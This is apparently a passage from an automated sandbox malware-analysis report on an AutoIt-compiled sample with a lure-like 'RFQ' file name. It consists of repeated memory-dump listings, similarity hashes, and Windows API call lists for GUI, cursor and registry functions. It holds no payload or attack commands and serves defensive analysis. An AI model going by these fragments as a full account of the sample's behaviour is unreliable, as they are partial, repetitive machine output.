                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                        • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                        • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                        • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                        • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                        • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                        • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                        APIs
                                                        • DeleteObject.GDI32(?), ref: 0045953B
                                                        • DeleteObject.GDI32(?), ref: 00459551
                                                        • DestroyWindow.USER32(?), ref: 00459563
                                                        • GetDesktopWindow.USER32 ref: 00459581
                                                        • GetWindowRect.USER32(00000000), ref: 00459588
                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                        • ShowWindow.USER32(?,00000004), ref: 00459865
                                                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                        • GetStockObject.GDI32(00000011), ref: 004598CD
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                        • DeleteDC.GDI32(00000000), ref: 004598F8
                                                        • _wcslen.LIBCMT ref: 00459916
                                                        • _wcscpy.LIBCMT ref: 0045993A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                        • GetDC.USER32(00000000), ref: 004599FC
                                                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 4040870279-2373415609
                                                        • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                        • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                        • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                        • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 0044181E
                                                        • SetTextColor.GDI32(?,?), ref: 00441826
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                        • GetSysColor.USER32(0000000F), ref: 00441849
                                                        • SetBkColor.GDI32(?,?), ref: 00441864
                                                        • SelectObject.GDI32(?,?), ref: 00441874
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                        • GetSysColor.USER32(00000010), ref: 004418B2
                                                        • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                        • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                        • DeleteObject.GDI32(?), ref: 004418D5
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                        • FillRect.USER32(?,?,?), ref: 00441970
                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                          • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                          • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                          • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                          • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                          • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                          • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                          • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                          • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                          • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                          • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                          • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                        • String ID:
                                                        • API String ID: 69173610-0
                                                        • Opcode ID: 30a00988875c6ded0cd8785ba6f1a2265e8c4300a859e5cf9301ac7df871b910
                                                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                        • Opcode Fuzzy Hash: 30a00988875c6ded0cd8785ba6f1a2265e8c4300a859e5cf9301ac7df871b910
                                                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                        APIs
                                                        • DestroyWindow.USER32(?), ref: 004590F2
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                        • GetStockObject.GDI32(00000011), ref: 004592AC
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                        • DeleteDC.GDI32(00000000), ref: 004592D6
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                        • GetStockObject.GDI32(00000011), ref: 004593D3
                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-3360698832
                                                        • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                        • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                        • SetCursor.USER32(00000000), ref: 0043075B
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                        • SetCursor.USER32(00000000), ref: 00430773
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                        • SetCursor.USER32(00000000), ref: 0043078B
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                        • SetCursor.USER32(00000000), ref: 004307A3
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                        • SetCursor.USER32(00000000), ref: 004307BB
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                        • SetCursor.USER32(00000000), ref: 004307D3
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                        • SetCursor.USER32(00000000), ref: 004307EB
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                        • SetCursor.USER32(00000000), ref: 00430803
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                        • SetCursor.USER32(00000000), ref: 0043081B
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                        • SetCursor.USER32(00000000), ref: 00430833
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                        • SetCursor.USER32(00000000), ref: 0043084B
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                        • SetCursor.USER32(00000000), ref: 00430863
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                        • SetCursor.USER32(00000000), ref: 0043087B
                                                        • SetCursor.USER32(00000000), ref: 00430887
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                        • SetCursor.USER32(00000000), ref: 0043089F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load
                                                        • String ID:
                                                        • API String ID: 1675784387-0
                                                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                        APIs
                                                        • GetSysColor.USER32(0000000E), ref: 00430913
                                                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                        • GetSysColor.USER32(00000012), ref: 00430933
                                                        • SetTextColor.GDI32(?,?), ref: 0043093B
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                        • GetSysColor.USER32(0000000F), ref: 00430959
                                                        • CreateSolidBrush.GDI32(?), ref: 00430962
                                                        • GetSysColor.USER32(00000011), ref: 00430979
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                        • SetBkColor.GDI32(?,?), ref: 004309A6
                                                        • SelectObject.GDI32(?,?), ref: 004309B4
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                        • GetSysColor.USER32(00000011), ref: 00430A9F
                                                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                        • SelectObject.GDI32(?,?), ref: 00430AD0
                                                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                        • SelectObject.GDI32(?,?), ref: 00430AE3
                                                        • DeleteObject.GDI32(?), ref: 00430AE9
                                                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1582027408-0
                                                        • Opcode ID: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                                                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                        • Opcode Fuzzy Hash: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                                                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CloseConnectCreateRegistry
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 3217815495-966354055
                                                        • Opcode ID: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                                                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                        • Opcode Fuzzy Hash: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                                                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 004566AE
                                                        • GetDesktopWindow.USER32 ref: 004566C3
                                                        • GetWindowRect.USER32(00000000), ref: 004566CA
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                        • DestroyWindow.USER32(?), ref: 00456746
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                        • IsWindowVisible.USER32(?), ref: 0045682C
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                        • GetWindowRect.USER32(?,?), ref: 00456873
                                                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                        • CopyRect.USER32(?,?), ref: 004568BE
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
